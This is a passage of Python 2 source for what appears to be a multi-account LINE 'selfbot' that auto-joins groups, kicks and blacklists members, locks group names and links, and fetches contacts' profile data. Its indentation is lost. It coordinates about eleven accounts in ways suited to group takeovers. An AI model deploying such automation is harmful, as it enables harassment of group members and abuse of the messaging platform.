mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
#print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Amid:
if op.param2 in Bmid:
X = ki.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
else:
X = kk.getGroup(op.param1)
kk.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kk.updateGroup(X)
Ticket = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Bmid:
if op.param2 in Cmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
else:
X = kc.getGroup(op.param1)
kc.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kc.updateGroup(X)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Cmid:
if op.param2 in Dmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kb.updateGroup(X)
Ti = kb.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kb.updateGroup(X)
else:
X = kb.getGroup(op.param1)
kb.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kb.updateGroup(X)
Ticket = kb.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
cl.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Dmid:
if op.param2 in Emid:
X = kb.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kd.updateGroup(X)
else:
X = kd.getGroup(op.param1)
kd.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kd.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Emid:
if op.param2 in Fmid:
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kf.updateGroup(X)
else:
X = kf.getGroup(op.param1)
kf.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kf.updateGroup(X)
Ticket = kf.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kf.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Fmid:
if op.param2 in Dmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kb.updateGroup(X)
Ti = kb.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kb.updateGroup(X)
else:
X = kb.getGroup(op.param1)
kb.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kb.updateGroup(X)
Ticket = kb.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kb.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Gmid:
if op.param2 in Amid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
kg.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
kg.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Hmid:
if op.param2 in Emid:
X = kb.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kd.updateGroup(X)
else:
X = kd.getGroup(op.param1)
kd.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
kh.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kd.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Jmid:
if op.param2 in Emid:
X = kb.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kj.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kd.updateGroup(X)
else:
X = kd.getGroup(op.param1)
kd.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
kj.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kd.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 32:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
fuck=random.choice(klist)
G = fuck.getGroup(op.param1)
fuck.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
kpist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
puck=random.choice(kpist)
G = puck.getGroup(op.param1)
G.preventJoinByTicket = True
puck.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = kb.getGroup(op.param1)
except:
try:
G = kd.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
kb.updateGroup(G)
except:
try:
kd.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kd.kickoutFromGroup(op.param1,[op.param2])
except:
pass
cl.sendText(op.param1,"Group name lock")
ki.sendText(op.param1,"Haddeuh dikunci Pe'a")
kk.sendText(op.param1,"Wekawekaweka Har Har")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------------------------[Welcome]----------------------------
if op.type == 17:
if wait["welcome"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1, "Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(op.param1, "Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
print "MEMBER HAS LEFT THE GROUP"
if op.type == 15:
if op.param2 in admin:
return
cl.sendText(op.param1, "Good Bye kaka akoohhh 😎😎")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------------------
if op.type == 11:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
kpist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
puck=random.choice(kpist)
G = puck.getGroup(op.param1)
G.preventJoinByTicket = True
puck.updateGroup(G)
puck.kickoutFromGroup(op.param1,[op.param2])
G = puck.getGroup(op.param1)
G.preventJoinByTicket = True
puck.updateGroup(G)
except Exception, e:
print e
if op.type == 13:
U = cl.getGroup(op.param1)
I = U.creator
if not op.param2 in Bots:
if wait["protectionOn"] == True:
klist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
puck=random.choice(klist)
G = puck.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
puck.cancelGroupInvitation(op.param1, gInviMids)
if op.type == 19:
if not op.param2 in Bots:
try:
gs = cl.getGroup(op.param1)
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
gs = kc.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots:
if wait["Backup"] == True:
try:
cl.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
kicker=random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(op.param1)
ky.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.2)
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.kickoutFromGroup(op.param1,[op.param2])
ky.leaveGroup(op.param1)
cl.updateGroup(G)
except Exception, e:
print e
if mid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki.getGroup(op.param1)
X.preventJoinByTicket = False
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kd.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
kb.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
kd.kickoutFromGroup(op.param1,[op.param2])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki.getGroup(op.param1)
X.preventJoinByTicket = False
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
ke.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Because there is no kick regulation or group,\n["+op.param1+"]\nof\n["+op.param2+"]\nI could not kick.\nAdd it to the black list.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == admin:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Succes")
ki.sendText(msg.to,"Secces")
kk.sendText(msg.to,"Succes")
kc.sendText(msg.to,"Succes")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"🔹[NAME]:\n" + msg.contentMetadata["displayName"] + "\n🔹[MID]:\n" + msg.contentMetadata["mid"] + "\n🔹[STATUS]:\n" + contact.statusMessage + "\n🔹[PICTURE STATUS]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n🔹[CoverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"🔹[NAME]:\n" + msg.contentMetadata["displayName"] + "\n🔹[MID]:\n" + msg.contentMetadata["mid"] + "\n🔹[STATUS]:\n" + contact.statusMessage + "\n🔹[PICTURE STATUS]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n🔹[CoverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Myhelp"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif ("Gn: " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn: ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif ("R1 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("R1 gn ","")
ki.updateGroup(X)
else:
ki.sendText(msg.to,"It can't be used besides the group.")
elif ("R2 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("R2 gn ","")
kk.updateGroup(X)
else:
kk.sendText(msg.to,"It can't be used besides the group.")
elif ("R3 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("R3 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
midd = msg.text.replace("Kick ","")
cl.kickoutFromGroup(msg.to,[midd])
elif "R1 kick " in msg.text:
midd = msg.text.replace("R1 kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "R2 kick " in msg.text:
midd = msg.text.replace("R2 kick ","")
kk.kickoutFromGroup(msg.to,[midd])
elif "Invite " in msg.text:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "R1 invite " in msg.text:
midd = msg.text.replace("R1 invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "R2 invite " in msg.text:
midd = msg.text.replace("R2 invite ","")
kk.findAndAddContactsByMid(midd)
kk.inviteIntoGroup(msg.to,[midd])
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif msg.text in ["1"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
elif msg.text in ["2"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
elif msg.text in ["3"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kk.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
cl.sendMessage(msg)
cl.sendMessage(msg)
elif msg.text in ["cancel","Cancel"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["All cancel","Bot cancel"]:
if msg.toType == 2:
G = kk.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
kk.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"No one is inviting")
else:
kk.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif "gurl" == msg.text:
print cl.getGroup(msg.to)
cl.sendMessage(msg)
elif msg.text in ["Qr on","Link on"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["R1 ourl","R1 link on"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["R2 ourl","R2 link on"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done ")
else:
kk.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Qr off","Link off"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["R1 curl","R1 link off"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done ")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
